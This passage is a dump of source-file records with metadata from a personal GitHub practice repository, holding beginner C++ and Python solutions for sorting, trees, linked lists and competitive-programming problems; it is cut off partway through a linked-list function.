"is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 529, "license_type": "permissive", "max_line_length": 40, "num_lines": 40, "path": "/C++/dec_long_2.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main(){\n\tint t, i ,j, n;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint cone = 0;\n\t\tint czero = 0;\n\t\tint ans = 0;\n\t\tcin >> n;\n\t\tvector< int > a(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> a[i];\n\t\t\tif(a[i] == 0)\n\t\t\t{\n\t\t\t\t++czero;\t\n\t\t\t}\n\t\t\telse if(a[i] == 2)\n\t\t\t{\n\t\t\t\t++cone;\n\t\t\t}\n\t\t}\n\t\tczero = (czero * (czero+1))/2 - czero;\n\t\tcone = (cone * (cone+1))/2 - cone;\n\t\tif(czero < 0)\n\t\t{\n\t\t\tczero = 0;\n\t\t}\n\t\telse if(cone < 0)\n\t\t{\n\t\t\tcone = 0;\n\t\t}\n\t\tans = cone + czero;\n\t\tcout << ans << \"\\n\";\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.3907427489757538, "alphanum_fraction": 0.4144241213798523, "avg_line_length": 9.311111450195312, "blob_id": "590ef0ca190e1624765d5b36443ef04f9399a18e", "content_id": "fcff20b1cbea7571609c9a310913ed61df9b2987", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 929, "license_type": "permissive", "max_line_length": 49, "num_lines": 90, "path": "/C++/MergeSort.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\n\nvoid merge(vector< int > &a, int l, int m, int r)\n{\n\tint i, j, k;\n\tint n1 = m - l + 1;\n\tint n2 = r - m;\n\t\n\tint left[n1];\n\tint right[n2];\n\t\n\tfor(i=0;i<n1;i++)\n\t{\n\t\tleft[i] = a[l+i];\n\t}\n\t\n\tfor(i=0;i<n2;i++)\n\t{\n\t\tright[i] = a[m+i+1];\n\t}\n\t\n\ti = 0; j = 0; k = l;\n\t\n\twhile(i < n1 && j < n2)\n\t{\n\t\tif(left[i] <= right[j])\n\t\t{\n\t\t\ta[k] = left[i];\n\t\t\ti++;\n\t\t\tk++;\n\t\t}\n\t\telse\n\t\t{\n\t\t\ta[k] = right[j];\n\t\t\tj++;\n\t\t\tk++; \n\t\t}\n\t}\n\t\n\twhile(i < n1)\n\t{\n\t\ta[k] = left[i];\n\t\ti++;\n\t\tk++;\n\t}\n\t\n\twhile(j < n2)\n\t{\n\t\ta[k] = right[j];\n\t\tj++;\n\t\tk++;\n\t}\n\t\n}\n\n\nvoid mergesort(vector< int > &ar, int l, int r)\n{\n\tif(l < r)\n\t{\n\t\tint m = l + (r - l)/2;\n\t\t\n\t\tmergesort(ar, l, m);\n\t\tmergesort(ar, m+1, r);\n\t\t\n\t\tmerge(ar, l, m, r);\n\t}\n}\n\n\nint main()\n{\n\tint n, i;\n\tcin >> n;\n\tvector< int >arr(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> arr[i];\n\t}\n\t\n\tmergesort(arr, 0, n-1);\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << arr[i] << \"\\t\";\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.43533122539520264, "alphanum_fraction": 0.460567831993103, "avg_line_length": 11.230769157409668, "blob_id": "bf9c4798547dce4d6790bccce0d432c17f50e0d4", "content_id": "18e1ac792bd5dcb8ee6ac35cc952aeb16a8b3d31", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 317, "license_type": "permissive", "max_line_length": 27, "num_lines": 26, "path": "/C++/LOALL.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint n,i,x;\n\tcin >> n;\n\tvector<int> a(n);\n\tvector<int>b;\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t\twhile(a[i] > 0)\n\t\t{\n\t\t\tx = a[i] %10;\n\t\t\tb.push_back(x);\n\t\t\ta[i] = a[i] / 10;\n\t\t}\n\t}\n\tsort(b.begin(),b.end());\n\tfor(i=b.size()-1;i>=0;i--)\n\t{\n\t\tcout << b[i];\n\t}\n\t\n}" }, { "alpha_fraction": 0.4767441749572754, "alphanum_fraction": 0.49031007289886475, "avg_line_length": 
11.560976028442383, "blob_id": "ade85a1f8f1305be5f8ed4088765fce2ed513771", "content_id": "6b8fda278c8fa7ad780bcfd8f94815858f672586", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 516, "license_type": "permissive", "max_line_length": 38, "num_lines": 41, "path": "/C++/Sort/Insertion.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nvoid insertionsort(vector< int > &vec)\n{\n\tint i,j, key;\n\tfor(i = 1; i < vec.size(); i++)\n\t{\n\t\tkey = vec[i];\n\t\tj = i - 1;\n\t\twhile(j >= 0 && key < vec[j])\n\t\t{\n\t\t\tvec[j+1] = vec[j];\n\t\t\tj--;\n\t\t}\t\n\t\tvec[j+1] = key;\n\t}\n}\n\n\nvoid printvector(vector< int > vec)\n{\n\tfor(int i = 0 ; i < vec.size(); i++)\n\t{\n\t\tcout << vec[i] << \"\\t\";\n\t}\n}\n\nint main()\n{\n\tint n, i;\n\tcin >> n;\n\tvector< int >vec(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> vec[i];\n\t}\n\tinsertionsort(vec);\n\tprintvector(vec);\n\n}\n\n" }, { "alpha_fraction": 0.5162703394889832, "alphanum_fraction": 0.5231539607048035, "avg_line_length": 13.660550117492676, "blob_id": "54a07cddc88b43c730addefb51aeed7ee5128647", "content_id": "d06c51fdb3d1b594877a773592bb2d55e5f03cd7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1598, "license_type": "permissive", "max_line_length": 77, "num_lines": 109, "path": "/C++/tree/levelOrder.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h> // No.of nodes at particular level using level order.\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\t\tint data;\n\t\tNode* left;\n\t\tNode* right;\n\t\tNode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tleft = NULL;\n\t\t\tright = NULL;\n\t\t}\n};\n\nNode* newNode(int data)\n{\n\tNode* new_node = new Node(data);\n\treturn new_node;\n}\n\n\nint maxwidth(Node* root)\n{\n\tif(root == NULL)\n\t{\n\t\treturn 0;\n\t}\n\tint result = 0;\n\t\n\tqueue<Node*> q;\n\tq.push(root);\n\twhile(!q.empty())\n\t{\n\t\tint count = q.size();\n\t\t\n\t\tresult = max(count, result);\n\t\t\n\t\twhile(count--)\n\t\t{\n\t\t\tNode* temp = q.front();\n\t\t\tq.pop();\n\t\t\t\n\t\t\tif(temp->left != NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->left);\n\t\t\t}\n\t\t\tif(temp->right != NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->right);\n\t\t\t}\n\t\t}\t\n\t}\n\treturn result;\n}\n\n\n//seperate lvl order\nvoid levelorder(Node* root)\n{\n\tif(root == NULL)\n\t{\n\t\tcout << 0;\n\t}\n\t\n\tqueue<Node*>q;\n\tq.push(root);\n\t\n\twhile(!q.empty())\n\t{\n\t\tint count = q.size();\n\t\t\n\t\twhile(count--)\n\t\t{\n\t\t\tNode *temp = q.front();\n\t\t\tq.pop();\n\t\t\tcout << temp->data << \" -> \" ;\n\t\t\t\n\t\t\tif(temp->left!=NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->left);\n\t\t\t}\n\t\t\tif(temp->right != NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->right);\t\n\t\t\t}\t\n\t\t}\n\t}\n\t\n}\n\nint main()\n{\n\tNode* root = newNode(1);\n root->left = newNode(2); \n root->right = newNode(3); \n root->left->left = newNode(4); \n root->left->right = newNode(5); \n root->right->right = newNode(8); \n root->right->right->left = newNode(6); \n root->right->right->right = newNode(7);\n \n cout << \"Level order is \" << \"\\n\";\n levelorder(root);\n cout <<\"\\n\";\n cout << \"Max width = \" << maxwidth(root) << \"\\n\";\n}\n" }, { "alpha_fraction": 0.5414937734603882, "alphanum_fraction": 0.5532503724098206, "avg_line_length": 12.514019012451172, "blob_id": "d58e5ccb8e0bd1cf306b0a26d9b1cf93f101ee9e", 
"content_id": "45be2e2dceccc56775878ecb42003bb44ff1a876", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1446, "license_type": "permissive", "max_line_length": 37, "num_lines": 107, "path": "/C++/Linkedlist/add & del node in between.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\t\tint data;\n\t\tNode* next;\n\t\tNode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tnext = NULL;\n\t\t}\n};\n\nclass Linkedlist\n{\n\tpublic:\n\tNode* head;\n\tNode* tail;\n\tint len;\n\tLinkedlist()\n\t{\n\t\thead = NULL;\n\t\ttail = NULL;\n\t\tlen = 0;\n\t}\n\t\n\tvoid append(int data)\n\t{\n\t\tNode* new_node = new Node(data);\n\t\tif(len == 0)\n\t\t{\n\t\t\thead = new_node;\n\t\t\ttail = new_node;\n\t\t\tnew_node->next = NULL;\n\t\t\t++len;\n\t\t}\n\t\telse\n\t\t{\n\t\t\ttail->next = new_node;\n\t\t\ttail = new_node;\n\t\t\ttail->next = NULL;\n\t\t\t++len;\n\t\t}\n\t}\n\t\n\t//Adding new node at specific index \n\tvoid addNode(int index, int data)\n\t{\n\t\tNode* new_node = new Node(data);\n\t\tint i = 0;\n\t\tNode* temp = head;\n\t\tNode* templink;\n\t\tfor(i=0;i<index-1;i++)\n\t\t{\n\t\t\ttemp = temp->next;\n\t\t}\n\t\ttemplink = temp->next;\n\t\ttemp->next = new_node;\n\t\tnew_node->next = templink;\n\t}\n\t\n\tvoid deleteNode(int index)\n\t{\n\t\tint i;\n\t\tNode* temp = head;\n\t\tNode* delNode;\n\t\tfor(i=0;i<index-1;i++)\n\t\t{\n\t\t\ttemp = temp->next;\n\t\t}\n\t\tdelNode = temp->next;\n\t\ttemp->next = delNode->next;\n\t\tdelNode->next = NULL;\n\t}\n\t\n\tvoid printlist()\n\t{\n\t\tNode* temp = head;\n\t\twhile(temp != NULL)\n\t\t{\n\t\t\tcout << temp->data << \" -> \";\n\t\t\ttemp = temp->next;\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n};\n\nint main()\n{\n\tLinkedlist* ll = new Linkedlist();\n\tll->append(2);\n\tll->append(3);\n\tll->append(4);\n\tll->append(5);\n\tll->append(6);\n\tll->append(7);\n\t\n\tll->addNode(2, 30);\n\t\n\tll->printlist();\n\t\n\tll->deleteNode(2);\n\t\n\tll->printlist();\n}\n" }, { "alpha_fraction": 0.39726027846336365, "alphanum_fraction": 0.4292237460613251, "avg_line_length": 17.869565963745117, "blob_id": "854a610fca518c55d2ef74d25cedf7098436f4c7", "content_id": "3c0a11420e671adb17737ec96a18ca6f1e414ed9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 438, "license_type": "permissive", "max_line_length": 37, "num_lines": 23, "path": "/C++/May Long/Isolation Centers.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 13:09:56 2020\n\n@author: teja\n\"\"\"\n\nt = int(input())\nwhile(t):\n n, q = map(int, input().split())\n li = list(input())\n se = set(li)\n dic = {}\n for i in se:\n dic[i] = li.count(i)\n for i in range(q):\n c = int(input())\n ans = 0\n for val in dic.values():\n if val > c:\n ans = ans + (val - c)\n print(ans)\n t-=1\n " }, { "alpha_fraction": 0.5938303470611572, "alphanum_fraction": 0.5981148481369019, "avg_line_length": 11.824175834655762, "blob_id": "2ceb5f9e5281c8f72d858c2d7f6f28a84e45f487", "content_id": "289ae5a8a7489b1980cc37c66789c1c9f5553041", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1167, "license_type": "permissive", "max_line_length": 36, "num_lines": 91, "path": "/C++/tree/traversals.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": 
"#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* left;\n\tNode* right;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tleft = NULL;\n\t\tright = NULL;\n\t}\n};\n\nNode* newNode(int data)\n{\n\tNode* new_node = new Node(data);\n\treturn new_node;\n}\n\nvoid inorderTraversal(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn;\n\t}\n\t\n\t//left \n\tinorderTraversal(node->left);\n\t\n\t//data\n\tcout << node->data << \" \";\n\t\n\t//right\n\tinorderTraversal(node->right);\n}\n\nvoid preorderTraversal(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn;\n\t}\n\t\n\t\t//data\n\tcout << node->data << \" \";\n\t\n\t//left \n\tpreorderTraversal(node->left);\n\t\n\t//right\n\tpreorderTraversal(node->right);\n}\n\nvoid postorderTraversal(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn;\n\t}\n\t\n\t//left \n\tpostorderTraversal(node->left);\n\t\n\t\t//right\n\tpostorderTraversal(node->right);\n\t\n\t//data\n\tcout << node->data << \" \";\n\t\n\n}\n\n\nint main()\n{\n\tNode* root = newNode(1);\n\troot->left = newNode(2); \n root->right = newNode(3); \n root->left->left = newNode(4); \n root->left->right = newNode(5); \n inorderTraversal(root);\n cout << \"\\n\";\n postorderTraversal(root);\n cout << \"\\n\";\n preorderTraversal(root);\n\n}\n" }, { "alpha_fraction": 0.45863309502601624, "alphanum_fraction": 0.4892086386680603, "avg_line_length": 16.80645179748535, "blob_id": "0b4645917effe6641ef8c2f94a45410adb8681d9", "content_id": "471fdd0ea2c703a5a692ad4667dced91986085e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 556, "license_type": "permissive", "max_line_length": 35, "num_lines": 31, "path": "/openlab_coding_preperation/Basic_Tree.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 5 11:33:27 2020\n\n@author: krish\n\"\"\"\n\nclass Node:\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n \n\ndef preorder(root):\n if(root):\n \n if(root.left):\n preorder(root.left)\n \n print(root.data)\n \n if root.right:\n preorder(root.right)\n\nif __name__=='__main__':\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n root.left.left = Node(10)\n preorder(root)\n " }, { "alpha_fraction": 0.5729646682739258, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 12.26530647277832, "blob_id": "8194e31a0043b44fcf2a4062f9feac084a4a303e", "content_id": "5ddd0ab9a24a2e03f97f04559a4216057c5725b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 651, "license_type": "permissive", "max_line_length": 36, "num_lines": 49, "path": "/C++/tree/inorder successor.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* left;\n\tNode* right;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tleft = right = NULL;\n\t}\n};\n\nNode* new_node(int data)\n{\n\tNode* newNode = new Node(data);\n\treturn newNode;\n}\n\nvoid inorder(Node* node)\n{\n\tNode* templ = node->left->left;\n\t//Node* tempr = node->left->left;\n\t\n\n\t\n\tif(templ == NULL)\n\t{\n\t\tcout << \"node\";\n\t\treturn;\n\t}\n\tinorder(node->left);\n\t\n\tcout << node->data << \" \";\n\t\n\tinorder(node->right);\n}\n\nint main()\n{\n\tNode* root = new_node(1);\n\troot->left = new_node(8); \n root->right = new_node(12); \n root->left->left = 
new_node(3); \n inorder(root);\n}\n\n" }, { "alpha_fraction": 0.442812979221344, "alphanum_fraction": 0.4760432839393616, "avg_line_length": 22.454545974731445, "blob_id": "18bbced1d55b9faf273f64735a1fbfc5f2df0e5f", "content_id": "fb91c7f19c4485713a313e2e086f8f2f54c6f9ab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1294, "license_type": "permissive", "max_line_length": 64, "num_lines": 55, "path": "/python/HPOJ/Owl Fight/Fight.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 6 10:19:45 2020\n\n@author: teja\n\"\"\"\n\ndef parent(use, a):\n if(use[a] < 0):\n return use[a]\n else:\n return parent(use, use[a])\n\n\n\nl = list(map(int,input().split()))\nn = l[0]\nm = l[1]\nuse = []\nuse.append(0)\nfor i in range(1, n+1):\n use.append(-i);\n#print(use)\nfor i in range(1, m+1):\n temp = list(map(int, input().split()))\n if(use[temp[0]] < 0 and use[temp[1]] < 0): \n use[temp[0]] = min(use[temp[0]], use[temp[1]])\n use[temp[1]] = temp[0]\n # print(\"use = \" + str(use))\n elif(use[temp[0]] > 0 and use[temp[1]] < 0):\n use[use[temp[0]]] = min(use[use[temp[0]]], use[temp[1]])\n use[temp[1]] = use[temp[0]]\n # print(\"use = \" + str(use))\n else:\n use[use[temp[1]]] = min(use[temp[0]], use[use[temp[1]]])\n use[temp[0]] = use[temp[1]]\n # print(\"use = \" + str(use))\n#print(use)\n\nq = int(input())\nfights = []\nfor i in range(q):\n a,b = list(map(int, input().split()))\n #print(\"a = \" + str(a))\n # print(\"b = \" + str(b))\n pa = abs(int(parent(use, a)))\n pb = abs(int(parent(use, b)))\n #print(\"pa = \" + str(pa))\n # print(\"pb = \" + str(pb))\n if(pa == pb):\n print(\"TIE\")\n elif (pa < pb):\n print(b)\n else:\n print(a)\n " }, { "alpha_fraction": 0.5731707215309143, "alphanum_fraction": 0.5820398926734924, "avg_line_length": 13.317460060119629, "blob_id": "f14625d456bb23ec662a7cc81c3a2c2a74ec2785", "content_id": "c982a614f0a6505c7bf36c8540e313107818c816", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 902, "license_type": "permissive", "max_line_length": 56, "num_lines": 63, "path": "/C++/tree/basic_func.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h> // Tree size & height\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* left;\n\tNode* right;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tleft = NULL;\n\t\tright = NULL;\n\t}\n};\n\nNode* new_node(int data)\n{\n\tNode* node = new Node(data);\n\treturn node;\n}\n\n// Size of tree - no.of nodes in a tree\nint size(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn 0;\n\t}\n\telse\n\t{\n\t\treturn (size(node->left) + 1 + size(node->right));\n\t}\n}\n\n// max ht of a tree\nint maxdepth(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn 0;\n\t}\n\telse\n\t{\n\t\tint ldepth = maxdepth(node->left);\n\t\tint rdepth = maxdepth(node->right);\n\t\t\n\t\treturn(max(ldepth, rdepth) + 1);\n\t}\n}\n\nint main()\n{\n\tNode* root = new_node(2);\n\troot->left = new_node(3);\n\troot->right = new_node(4);\n\troot->left->right = new_node(5);\n\t\n\tcout << \"height of tree is \" << maxdepth(root) << \"\\n\";\n\tcout << \"size of tree is \"<< size(root) << \"\\n\";\n\t\n}\n" }, { "alpha_fraction": 0.35322195291519165, "alphanum_fraction": 0.38424819707870483, "avg_line_length": 8.545454978942871, "blob_id": "97b449dde8379b793bf5dbb9a7af148b449b5040", "content_id": 
"777a5e8a2746cb25056a9042d4b2dd893723b79c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 419, "license_type": "permissive", "max_line_length": 23, "num_lines": 44, "path": "/C++/CIELAB.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tsrand (time(NULL));\n\tint a,b,c,d;\n\tcin >> a >> b;\n\tc = a-b;\n\td = c % 10;\n\tb = c / 10;\n\tif(b==0)\n\t{\n\t\tc = rand() % 5;\n\twhile(1)\n\t{\n\t\tif(c==d || c == 0)\n\t\t{\n\t\tc = rand() % 5;\t\n\t\t}\t\n\t\telse\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\tcout << c;\n\t}\n\telse\n\t{\n\t\tc = rand() % 5;\n\twhile(1)\n\t{\n\t\tif(c==d || c==0)\n\t\t{\n\t\tc = rand() % 5;\t\n\t\t}\t\n\t\telse\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\tcout << b << c;\n\t}\n\t\n}" }, { "alpha_fraction": 0.3958333432674408, "alphanum_fraction": 0.4109848439693451, "avg_line_length": 10.21276569366455, "blob_id": "be3a80f5eeab3a4087ffeb8654e312647791209f", "content_id": "49cefe03750198642c51b0014cca74fb74bf5c2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 528, "license_type": "permissive", "max_line_length": 29, "num_lines": 47, "path": "/C++/Selectionsort.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint n, i, j;\n\tcin >> n;\n\tvector< int >val(n);\n\tint ind = 0, min;\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> val[i];\n\t}\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << val[i] << \"\\t\";\n\t}\n\tcout << \"\\n\";\n\t\n\tfor(i=0;i<n-1;i++)\n\t{\n\t\tmin = val[i+1];\n\t\tind = i+1;\n\t\tfor(j=i;j<n;j++)\n\t\t{\n\t\t\tif(min > val[j])\n\t\t\t{\n\t\t\t\tmin = val[j];\n\t\t\t\tind = j;\n\t\t\t}\n\t\t}\n\t\tint temp = min;\n\t\tval[ind] = val[i];\n\t\tval[i] = temp;\n\t}\n\t\n\tcout << \"came out \" << \"\\n\";\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << val[i] << \"\\t\";\n\t}\n\t\n\n}\n\n" }, { "alpha_fraction": 0.4244185984134674, "alphanum_fraction": 0.44476744532585144, "avg_line_length": 12.269230842590332, "blob_id": "657784d15baa504f825fa12cddc78e0432a4a159", "content_id": "9bcf8de201d28ae3514a0d8bc70642b9c1b8ed3a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 344, "license_type": "permissive", "max_line_length": 29, "num_lines": 26, "path": "/C++/HORSES.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tint t,n,i;\n\tcin >> t; \n\twhile(t--)\n\t{\n\tcin >> n;\n\tvector< long long > a(n);\n\tfor(i=0; i<n; i++)\n\t{\n\t\tcin >> a[i];\n\t}\n\tsort(a.begin(),a.end());\n\tlong long min = a[1] - a[0];\n\tfor(i=1;i<n-1;i++)\n\t{\n\t\tif(min > (a[i+1] - a[i]))\n\t\t{\n\t\t\tmin = a[i+1] - a[i];\n\t\t}\n\t}\n\tcout << min << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 0.47089946269989014, "avg_line_length": 16.677419662475586, "blob_id": "9cdaa8c0ac2f1fbaa5d04108287591be72275d46", "content_id": "b5b844ff8828bcbaadf00fe55a1ac61f5d84cca0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "permissive", "max_line_length": 35, "num_lines": 31, "path": "/openlab_coding_preperation/LL.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:11:19 
2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LL:\n \n def __init__(self):\n self.head = None\n \n def printLL(self):\n temp = self.head\n while(temp):\n print(temp.data)\n temp = temp.next\n\nif __name__=='__main__':\n llist = LL()\n \n llist.head = Node(1)\n llist.head.next = Node(2)\n llist.head.next.next = Node(3)\n \n llist.printLL()\n \n \n \n " }, { "alpha_fraction": 0.5532646179199219, "alphanum_fraction": 0.5567010045051575, "avg_line_length": 14.315789222717285, "blob_id": "830a86f33ae8d03507b74c0f9acdf16e321de31d", "content_id": "de6e64aa877d29f21e934276af1d51d828212df2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 291, "license_type": "permissive", "max_line_length": 33, "num_lines": 19, "path": "/C++/macros.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "//#include<bits/stdc++.h>\n//#define EXEC m##a##i##n\n//#define g(a) #a\n//#define h(a) EXEC( )\n//using namespace std;\n//int h(a)\n//{\n//cout<<\"Hello \"<<g(world)<<endl;\n//return 0;\n//}\n\n#include<bits/stdc++.h>\nusing namespace std;\n#define h(a) #a\n\nint main()\n{\n\tcout << \"func = \" << h(macro);\n}\n" }, { "alpha_fraction": 0.39677420258522034, "alphanum_fraction": 0.42903226613998413, "avg_line_length": 11.399999618530273, "blob_id": "e0b8cb406a210b9e6172f2106aa543a8be849a50", "content_id": "dba88a17763b41485abbe20b1f6e494866a72ec6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 310, "license_type": "permissive", "max_line_length": 28, "num_lines": 25, "path": "/C++/dec_long_1.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, p, s, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tvector<int> a(10,0);\n\t\tcin >> n;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> p >> s;\n\t\t\ta[p-1] = max(a[p-1], s);\t\n\t\t}\n\t\tint ans = 0;\n\t\tfor(i=0;i<=7;i++)\n\t\t{\n\t\t\tans+=a[i];\n\t\t}\n\t\tcout << ans << \"\\n\";\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.41952505707740784, "alphanum_fraction": 0.4313984215259552, "avg_line_length": 13.576923370361328, "blob_id": "7ad61663cf1de8761ec5888d605f588b0867feff", "content_id": "185c30b679c0eda52c25f83716954e37acf72d81", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 758, "license_type": "permissive", "max_line_length": 40, "num_lines": 52, "path": "/C++/XOR.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint countSetBits(int n) \n{ \n unsigned int count = 0; \n while (n) { \n n &= (n - 1); \n count++; \n } \n return count; \n} \n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n \n int t, n, q, i, p, bits = 0;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tcin >> q;\n\t\tvector< int > val(n);\n\t\tvector< int > xoo(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> val[i];\n\t\t}\n\t\twhile(q--)\n\t\t{\n\t\t\tint ceven = 0, codd = 0;\n\t\t\tcin >> p;\n\t\t\tfor(i=0;i<n;i++)\n\t\t\t{\n\t\t\t\txoo[i] = val[i] ^ p;\n//\t\t\t\tbits = __builtin_popcount(xoo[i]);\n\t\t\t\tbits = countSetBits(xoo[i]);\n\t\t\t\tif(bits % 2 == 0)\n\t\t\t\t{\n\t\t\t\t\tceven++;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcodd++;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcout << ceven << \" \" << codd << \"\\n\";\n\t\t}\n\t}\n}\n" 
}, { "alpha_fraction": 0.421875, "alphanum_fraction": 0.43914473056793213, "avg_line_length": 19.827587127685547, "blob_id": "ef132ba0cbcd428d6d91533950f0e06ff73da99a", "content_id": "35ce801f8349b6559a6ca889c0b25056917bd071", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "permissive", "max_line_length": 42, "num_lines": 58, "path": "/openlab_coding_preperation/remove_nth-node_fromEnd.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:35:38 2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n \n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LL:\n def __init__(self, data):\n node = Node(data)\n self.head = node\n \n def attachLink(self,data):\n temp = self.head\n while(temp.next!=None):\n temp = temp.next\n node = Node(data)\n temp.next = node\n \n def printLL(self):\n temp = self.head\n while(temp):\n print(temp.data,end=\" -> \")\n temp = temp.next\n \n def remove(self, n, l):\n if n > len(l):\n n = n % len(l)\n \n if n == 